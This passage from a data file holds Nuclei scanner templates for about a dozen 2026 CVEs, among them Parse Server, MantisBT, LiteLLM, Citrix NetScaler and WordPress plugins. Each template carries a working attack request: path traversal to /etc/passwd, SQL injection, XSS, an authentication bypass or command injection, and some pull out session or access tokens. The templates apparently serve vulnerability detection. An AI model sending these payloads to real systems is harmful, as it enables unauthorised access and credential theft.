CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-31807\n    epss-score: 0.00445\n    epss-percentile: 0.38123\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,xss,svg,reflected,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/system/version\"\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'status_code == 200'\n          - 'compare_versions(ver, \">= 0.0.1\", \"<= 3.5.9\")'\n        condition: and\n\n    extractors:\n      - type: json\n        name: ver\n        internal: true\n        json:\n          - '.data'\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca%3E%3Canimate+attributeName%3D%22href%22+values%3D%22javascript%3Aalert%28document.domain%29%22+begin%3D%220s%22+fill%3D%22freeze%22%2F%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: response\n        words:\n          - '<animate attributeName=\"href\" values=\"javascript:alert(document.domain)\" begin=\"0s\" fill=\"freeze\"/>'\n          - 'id=\"dynamic_icon_type8'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"image/svg+xml\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c4b2fade30f6abbf34cdffdc18f7ba8cce6ff34ff8ed01e93977ed4ae802470f02202dd18ef97bad5873802b152f21e69e5bb6c694b30c6f83bf719fac4534af496c:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-31807.yaml","vuln_id":"cve-2026-31807"},{"raw":"id: CVE-2026-30965\n\ninfo:\n  name: Parse Server < 8.6.21 / 9.x < 9.5.2 - Session Token Exfiltration\n  author: str4k3r,0x_Akoko\n  severity: critical\n  description: |\n    Parse Server < 8.6.21 / 9.x < 9.5.2 contains an information disclosure vulnerability caused by improper handling of the redirectClassNameForKey query parameter, letting authenticated or unauthenticated attackers exfiltrate session tokens, exploit requires ability to create or update an object with a new relation field depending on Class-Level Permissions.\n  impact: |\n    Attackers can exfiltrate session tokens and take over user accounts, leading to account compromise.\n  remediation: |\n    Update to version 9.5.2-alpha.8 or 8.6.21 or later.\n  reference:\n    - https://github.com/parse-community/parse-server/security/advisories/GHSA-6r2j-cxgf-495f\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-30965\n    - https://github.com/parse-community/parse-server/commit/70b7b070e1135949dd80ecf382f34db0bfdbb71e\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 9.9\n    cve-id: CVE-2026-30965\n    epss-score: 0.01329\n    epss-percentile: 0.69796\n    cwe-id: CWE-863\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: parse-community\n    product: parse-server\n    shodan-query: '\"X-Parse-Application-Id\" OR http.html:\"parseServerVersion\"'\n    fofa-query: 'body=\"parseServerVersion\" || header=\"X-Parse-Application-Id\"'\n  tags: cve,cve2026,parse,parse-server,session-hijack,auth-bypass\n\nvariables:\n  cn: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: (http(1) || http(2)) && http(3) && http(4) && http(5)\n\nhttp:\n  - raw:\n      - |\n        GET {{BaseURL}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: appid\n        internal: true\n        group: 1\n        regex:\n          - '(?:applicationId|appId|APP_ID|PARSE_APP_ID)\\s*[=:,]\\s*\"([A-Za-z0-9]{20,})\"'\n          - 'Parse\\.initialize\\(\"([A-Za-z0-9]{20,})\"'\n          - 'X-Parse-Application-Id[\"\\s:]+([A-Za-z0-9]{20,})'\n\n      - type: regex\n        name: jskey\n        internal: true\n        group: 1\n        regex:\n          - '(?:javascriptKey|javaScriptKey|jsKey|JS_KEY|PARSE_JS_KEY)\\s*[=:,]\\s*\"([A-Za-z0-9]{20,})\"'\n          - 'Parse\\.initialize\\(\"[A-Za-z0-9]+\"\\s*,\\s*\"([A-Za-z0-9]{20,})\"'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'len(appid) > 0'\n          - 'len(jskey) > 0'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET {{BaseURL}}/index.js HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: appid\n        internal: true\n        group: 1\n        regex:\n          - '(?:applicationId|appId|APP_ID|PARSE_APP_ID)\\s*[=:,]\\s*\"([A-Za-z0-9]{20,})\"'\n          - 'Parse\\.initialize\\(\"([A-Za-z0-9]{20,})\"'\n          - 'X-Parse-Application-Id[\"\\s:]+([A-Za-z0-9]{20,})'\n\n      - type: regex\n        name: jskey\n        group: 1\n        regex:\n          - '(?:javascriptKey|javaScriptKey|jsKey|JS_KEY|PARSE_JS_KEY)\\s*[=:,]\\s*\"([A-Za-z0-9]{20,})\"'\n          - 'Parse\\.initialize\\(\"[A-Za-z0-9]+\"\\s*,\\s*\"([A-Za-z0-9]{20,})\"'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'len(appid) > 0'\n          - 'len(jskey) > 0'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET {{BaseURL}}/parse/health HTTP/1.1\n        Host: {{Hostname}}\n        X-Parse-Application-Id: {{appid}}\n        X-Parse-Javascript-Key: {{jskey}}\n\n    matchers:\n      - type: dsl\n        internal: true\n        condition: and\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"ok\")'\n\n  - raw:\n      - |\n        POST {{BaseURL}}/parse/classes/{{cn}} HTTP/1.1\n        Host: {{Hostname}}\n        X-Parse-Application-Id: {{appid}}\n        X-Parse-Javascript-Key: {{jskey}}\n        Content-Type: application/json\n\n        {\"pivot\":{\"__op\":\"AddRelation\",\"objects\":[{\"__type\":\"Pointer\",\"className\":\"_Session\",\"objectId\":\"{{cn}}\"}]}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n          - 'contains(body, \"objectId\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET {{BaseURL}}/parse/classes/{{cn}}?redirectClassNameForKey=pivot&limit=3 HTTP/1.1\n        Host: {{Hostname}}\n        X-Parse-Application-Id: {{appid}}\n        X-Parse-Javascript-Key: {{jskey}}\n\n    extractors:\n      - type: regex\n        name: session_tokens\n        group: 1\n        regex:\n          - '\"sessionToken\"\\s*:\\s*\"(r:[a-f0-9]+)\"'\n      - type: regex\n        name: user_ids\n        group: 1\n        regex:\n          - '\"user\":{\"__type\":\"Pointer\",\"className\":\"_User\",\"objectId\":\"([A-Za-z0-9]+)\"'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"sessionToken\", \"results\")'\n        condition: and\n# digest: 490a0046304402200c643c7f8f6af01e433717bbf5e72ca4ce3d15bddb561efbe18d1b7b6daa162e02205880ca8cbde6eafb0d5c558222b9cf8e9c693292762b04bc83bed91a716eebd1:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-30965.yaml","vuln_id":"cve-2026-30965"},{"raw":"id: CVE-2026-30958\n\ninfo:\n  name: OneUptime < 10.0.21 - Path Traversal\n  author: ashvinctrl,iconnnjka\n  severity: high\n  description: |\n    OneUptime < 10.0.21 contains a path traversal caused by unsanitized componentName parameter in /workflow/docs/:componentName endpoint, letting unauthenticated attackers read arbitrary files from the server filesystem.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.\n  remediation: |\n    Upgrade to version 10.0.21 or later.\n  reference:\n    - https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-30958\n    - https://github.com/OneUptime/oneuptime\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 7.2\n    cve-id: CVE-2026-30958\n    epss-score: 0.01139\n    epss-percentile: 0.6519\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: title=\"OneUptime\"\n  tags: cve,cve2026,oneuptime,lfi,path-traversal,vuln,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/workflow/docs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200677d2c57cbc35f6cb9588b66425446cb0f0a363ff4856ef77fbc3c5af879bfa022100c5d0ace69800f1f87480d187012fe464fd1e6020496e35c5dd21f8bd5f9810b9:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-30958.yaml","vuln_id":"cve-2026-30958"},{"raw":"id: CVE-2026-30928\n\ninfo:\n  name: Glances - Information Disclosure\n  author: theamanrawat\n  severity: high\n  description: |\n    Glances < 4.5.1 contains an information disclosure vulnerability caused by unfiltered exposure of sensitive configuration data via the /api/4/config REST API endpoint, letting remote attackers access credentials, exploit requires API access.\n  impact: |\n    Attackers can access sensitive credentials, including passwords and keys, leading to potential full system compromise.\n  remediation: |\n    Upgrade to version 4.5.1 or later.\n  reference:\n    - https://github.com/nicolargo/glances/security/advisories/GHSA-gh4x-f7cq-wwx6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-30928\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-30928\n    epss-score: 0.01657\n    epss-percentile: 0.75562\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,glances,exposure\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/4/config\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - '\"password\": \"[A-Za-z0-9_@.#&+-;$]*\",'\n\n      - type: word\n        part: header\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022017e731591fdd3dea79a997e499f01264bf9ef0c1630a03b0c3c5cfe78014fec9022100b300730134ffd8568ffcfd599635aab2748011ea6f1b925b96aee5d99fcb737b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-30928.yaml","vuln_id":"cve-2026-30928"},{"raw":"id: CVE-2026-30849\n\ninfo:\n  name: MantisBT < 2.28.1 - SOAP API Authentication Bypass\n  author: str4k3r\n  severity: critical\n  description: |\n    Mantis Bug Tracker < 2.28.1 on MySQL databases contains an authentication bypass caused by improper type checking on the password parameter in the SOAP API, letting attackers login without the actual password using a crafted SOAP envelope, exploit requires knowing the victim's username.\n  impact: |\n    Attackers can bypass authentication to access victim accounts and execute API functions, potentially compromising user data and system integrity.\n  remediation: |\n    Upgrade to version 2.28.1 or later; disabling the SOAP API reduces risk.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-30849\n    - https://github.com/mantisbt/mantisbt/security/advisories/GHSA-phrq-pc6r-f6gh\n    - https://mantisbt.org/bugs/view.php?id=36902\n  classification:\n    cve-id: CVE-2026-30849\n    epss-score: 0.01457\n    epss-percentile: 0.72348\n    cwe-id: CWE-843\n    cvss-score: 9.3\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: mantisbt\n    product: mantisbt\n    shodan-query: http.title:\"MantisBT\"\n    fofa-query: title=\"MantisBT\"\n  tags: cve,cve2026,mantisbt,soap,auth-bypass,type-confusion,mysql,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /api/soap/mantisconnect.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml; charset=utf-8\n        SOAPAction: \"http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_login\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\">\n          <SOAP-ENV:Body>\n            <ns1:mc_login xmlns:ns1=\"http://futureware.biz/mantisconnect\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n              <username xsi:type=\"xsd:string\">administrator</username>\n              <password xsi:type=\"xsd:int\">0</password>\n            </ns1:mc_login>\n          </SOAP-ENV:Body>\n        </SOAP-ENV:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"mc_loginResponse\", \"access_level\")'\n        condition: and\n# digest: 4a0a00473045022100d192490179de232f1480e4ab6365feaa5264159539d0f5d0ae60b3aac3918d9b022054747f8cb52f66f654318fd7d6f9e3e7a68ccd39abc69de62528049307ea7778:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-30849.yaml","vuln_id":"cve-2026-30849"},{"raw":"id: CVE-2026-30824\n\ninfo:\n  name: Flowise - NVIDIA NIM Endpoints Missing Authentication\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.\n  impact: |\n    Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise.\n  remediation: This issue has been patched in version 3.0.13\n  reference:\n    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-30824\n    - https://github.com/FlowiseAI/Flowise\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-30824\n    epss-score: 0.3625\n    epss-percentile: 0.9841\n    cwe-id: CWE-306\n  metadata:\n    max-request: 2\n    vendor: flowiseai\n    product: flowise\n    shodan-query: title:\"Flowise\"\n    fofa-query: title=\"Flowise\"\n  tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/nvidia-nim/get-token\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, 'access_token','token_type')\"\n        condition: and\n\n    extractors:\n      - type: regex\n        name: access_token\n        group: 1\n        regex:\n          - '\"access_token\"\\s*:\\s*\"([^\"]+)\"'\n        part: body\n# digest: 4a0a0047304502200b9b8f67ce25868305450688329c14fb21c99e13670d04a861c5fd1398b26fae022100bd3ecbdddfd6b5d6f7aefa7f4aeb8f1c38070a1139ab6e9b91df314d591f1c77:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-30824.yaml","vuln_id":"cve-2026-30824"},{"raw":"id: CVE-2026-30623\n\ninfo:\n  name: LiteLLM 1.18.10 - Command Injection\n  author: leeseungsu\n  severity: high\n  description: |\n    LiteLLM 1.18.10 contains a remote code execution caused by lack of validation of arbitrary command and args in MCP server creation, letting attackers execute OS commands remotely, exploit requires crafted JSON configuration.\n  impact: |\n    Attackers can execute arbitrary OS commands remotely with LiteLLM process privileges, potentially compromising the host system.\n  remediation: |\n    Update to the latest version of LiteLLM with validation for MCP server commands.\n  reference:\n    - https://docs.litellm.ai/blog/mcp-stdio-command-injection-april-2026\n    - https://cveawg.mitre.org/api/cve/CVE-2026-30623\n    - https://github.com/BerriAI/litellm\n  classification:\n    cve-id: CVE-2026-30623\n    epss-score: 0.04997\n    epss-percentile: 0.91842\n    cwe-id: CWE-77\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,litellm,rce,authenticated,mcp\n\nvariables:\n  marker: \"{{randstr}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /mcp-rest/test/connection HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n        {\n          \"server_id\": \"nuclei-{{marker}}\",\n          \"server_name\": \"nuclei-{{marker}}\",\n          \"transport\": \"stdio\",\n          \"command\": \"sh\",\n          \"args\": [\"-c\", \"sleep 4\"]\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"Failed to connect to MCP server\"\n\n      - type: word\n        part: body\n        negative: true\n        words:\n          - \"not in the allowed commands list\"\n          - \"Allowed commands\"\n\n      - type: dsl\n        dsl:\n          - \"duration >= 4\"\n# digest: 4b0a00483046022100f5722eee6e9153aa4cd75bd2e236bb2a98bb9818c128886bb07c67215eba38c2022100ba635df70448b9a7f2452d8dbf12a5c1df761d09f7292978645a395f4846efde:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-30623.yaml","vuln_id":"cve-2026-30623"},{"raw":"id: CVE-2026-3055\n\ninfo:\n  name: Citrix NetScaler SAML IDP - Memory Overread\n  author: watchtowr,shaikhyaser,DhiyaneshDk\n  severity: critical\n  description: |\n    NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP, leading to memory overread, letting attackers potentially access sensitive memory, exploit requires configuration as SAML IDP\n  impact: |\n    Attackers can cause memory overread, potentially exposing sensitive information or causing application instability.\n  remediation: Update to the latest version with the fix for this vulnerability.\n  reference:\n    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300\n    - https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/\n    - https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query:\n      - title:\"NetScaler Gateway\"\n      - title:\"NetScaler AAA\"\n      - http.favicon.hash:-1166125415\n      - http.favicon.hash:-1292923998\n    fofa-query:\n      - title=\"NetScaler Gateway\"\n      - title=\"NetScaler AAA\"\n      - icon_hash=\"-1166125415\"\n      - icon_hash=\"-1292923998\"\n  tags: cve,cve2026,netscaler,citrix,exposure,kev,vkev,vuln\n\nflow: http(1) || http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /saml/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept-Encoding: gzip\n\n        SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiANCnhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iICANCklEPSJfMSINClZlcnNpb249IjIuMCIgUHJvdmlkZXJOYW1lPSJteSBwcm92aWRlciIgDQpEZXN0aW5hdGlvbj0iaHR0cDovL3dhdGNodG93ci9zYW1sLnBocCIgDQpQcm90b2NvbEJpbmRpbmc9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpiaW5kaW5nczpIVFRQLVBPU1QiIA0KPg0KICA8c2FtbDpJc3N1ZXI%2BaHR0cDovL3dhdGNodG93ci9zYW1sLnBocDwvc2FtbDpJc3N1ZXI%2BDQo8L3NhbWxwOkF1dGhuUmVxdWVzdD4%3D\n\n      - |\n        GET /wsfed/passive?wctx HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - regex('(?i)NSC_TASS=[A-Za-z0-9+/]+=*', set_cookie)\n          - 'status_code == 302'\n          - 'contains(base64_decode(nsc_tass), \"wctx=\")'\n          - '!contains(body, \"Parsing of presented Assertion failed\")'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - base64_decode(nsc_tass)\n# digest: 4a0a004730450220406d2dccc32a82831ddc8dfdec81d513c70d55da7324594a5ead9cdcf01a770102210086e0c3ca49f0abb8959e67730de028261f4ef59e17332d52ac062fc0e84d5a40:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-3055.yaml","vuln_id":"cve-2026-3055"},{"raw":"id: CVE-2026-3018\n\ninfo:\n  name: WordPress Newsletters <= 4.13 - Unauthenticated SQL Injection\n  author: pussycat0x\n  severity: high\n  description: |\n    Newsletters WordPress plugin <= 4.13 contains a time-based SQL injection caused by insufficient escaping of the 'wpmlsubscriber_id' parameter, letting unauthenticated attackers extract sensitive database information.\n  impact: |\n    Unauthenticated attackers can extract sensitive information from the database, potentially compromising data confidentiality.\n  remediation: Update to the latest version beyond 4.13.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite/newsletters-413-unauthenticated-sql-injection\n    - https://plugins.trac.wordpress.org/changeset/3566485/newsletters-lite\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-3018\n    epss-score: 0.01382\n    epss-percentile: 0.7095\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: tribulant\n    product: newsletters\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/newsletters-lite/\"\n  tags: cve,cve2026,sqli,wp,wp-plugin,newsletters-lite,time-based-sqli,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/newsletters-lite/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Newsletters\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        internal: true\n        group: 1\n        regex:\n          - '(?i)Stable\\s*tag:\\s*(\\d+\\.\\d+(?:\\.\\d+)?)'\n\n  - raw:\n      - |\n        @timeout: 20s\n        GET /newsletter-management/?method=unsubscribe&wpmlsubscriber_id=1'+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn)+AND+'1'='1&authkey=x&wpmlmailinglist_id=1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(body, \"wp-content\") || contains(body, \"wordpress\") || contains(body, \"newsletter\")'\n        condition: and\n# digest: 4b0a00483046022100c4a38a4a73be994f0cb54294a4d14a2efad8af107a6675cddb23f554b6e6d5dd022100ebdec79028dc7bac94de858e0971f7386b604cb9406d2a9de18c806be387f43f:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-3018.yaml","vuln_id":"cve-2026-3018"},{"raw":"id: CVE-2026-3001\n\ninfo:\n  name: Gutenverse Plugin <= 3.4.6 - Cross-Site Scripting\n  author: coffeetaro_12\n  severity: medium\n  description: |\n    The Gutenverse plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in versions up to and including 3.4.6. The issue arises due to insufficient input sanitization and output escaping in the `render_content()` method of `class-search-result-title.php`, which outputs the value of `get_query_var('s')` directly into the page HTML without applying `esc_html()`. This makes it possible for unauthenticated attackers to inject and execute arbitrary web scripts in pages via a crafted URL, provided the `gutenverse/search-result-title` block is present on the site's search results template.\n  impact: |\n    Unauthenticated attackers can execute arbitrary scripts in users' browsers, leading to session hijacking or phishing.\n  remediation: |\n    Update to a version later than 3.4.6 or latest available version.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-3001\n    - https://wpscan.com/vulnerability/b4d5571b-fcbf-409d-be91-efcfe9a3fa95/\n    - https://patchstack.com/database/wordpress/plugin/gutenverse/vulnerability/wordpress-gutenverse-wordpress-blocks-page-builder-site-editor-plugin-3-4-6-reflected-cross-site-scripting-vulnerability\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-3001\n    epss-score: 0.00473\n    epss-percentile: 0.40042\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: jegstudio\n    product: gutenverse\n    publicwww-query: \"/wp-content/plugins/gutenverse/\"\n  tags: cve,cve2026,xss,wordpress,gutenverse,wp-plugin,wp\n\nhttp:\n  - raw:\n      - |\n        GET /?s=<script>alert(1)</script> HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<script>alert(1)</script>\"\n          - \"gutenverse\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n    extractors:\n      - type: regex\n        part: body\n        regex:\n          - \"<span class='search-input-text'><script>alert(1)</script></span>\"\n# digest: 4a0a00473045022016918fd5178c7c22908d7efafddffb3350f7ec3870f881a03522a2edae019f2d022100a667aa9f70d2aa92091a3998701d89797bfbd13b1cae76d7a7d65d2afc2f52b2:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-3001.yaml","vuln_id":"cve-2026-3001"},{"raw":"id: CVE-2026-29963\n\ninfo:\n  name: HSC MailInspector - Unauthenticated Arbitrary File Read\n  author: str4k3r\n  severity: high\n  description: |\n    HSC MailInspector 5.3.3-7 contains a path traversal caused by improper validation of user-supplied input in /tap/dw.php text parameter, letting remote attackers access arbitrary files, exploit requires crafted request.\n  impact: |\n    Remote attackers can access arbitrary files, leading to unauthorized disclosure of sensitive information.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29963\n    - https://hsclabs.com/pt-br/mailinspector/\n  classification:\n    cve-id: CVE-2026-29963\n    epss-score: 0.02082\n    epss-percentile: 0.80696\n    cwe-id: CWE-22\n    cvss-score: 7.5\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: hsclabs\n    product: mailinspector\n    shodan-query: http.html:\"mailinspector\"\n    fofa-query: body=\"mailinspector\"\n  tags: cve,cve2026,mailinspector,lfi,traversal,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /mailinspector/tap/dw.php?name&sha1&ext=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n# digest: 4a0a004730450220539de4788fbbb35c4e80c626002dc06c8f7542463b7c19bb559424a194428171022100fdba7115688e061bdfc03d6781abc658919e612e481cde2ee09c263f35343485:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-29963.yaml","vuln_id":"cve-2026-29963"},{"raw":"id: CVE-2026-29962\n\ninfo:\n  name: HSC MailInspector - Local File Inclusion\n  author: str4k3r\n  severity: high\n  description: |\n    HSC MailInspector v5.3.3-7 contains a path traversal caused by improper control of user-supplied file paths in /vendor/phpunit/phpunit.php, letting remote attackers read arbitrary files, exploit requires crafted request.\n  impact: |\n    Remote attackers can read arbitrary files, potentially disclosing sensitive information from the system.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29962\n  classification:\n    cve-id: CVE-2026-29962\n    epss-score: 0.01163\n    epss-percentile: 0.65857\n    cwe-id: CWE-73\n    cvss-score: 7.5\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: hsclabs\n    product: mailinspector\n    shodan-query: http.html:\"mailinspector\"\n    fofa-query: body=\"mailinspector\"\n  tags: cve,cve2026,mailinspector,php,phpunit,lfi\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/mailinspector\"\n\n    redirects: true\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"/mailinspector/\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/mailinspector/vendor/phpunit/phpunit.php?--bootstrap=/etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"root:x:0:0:\"\n# digest: 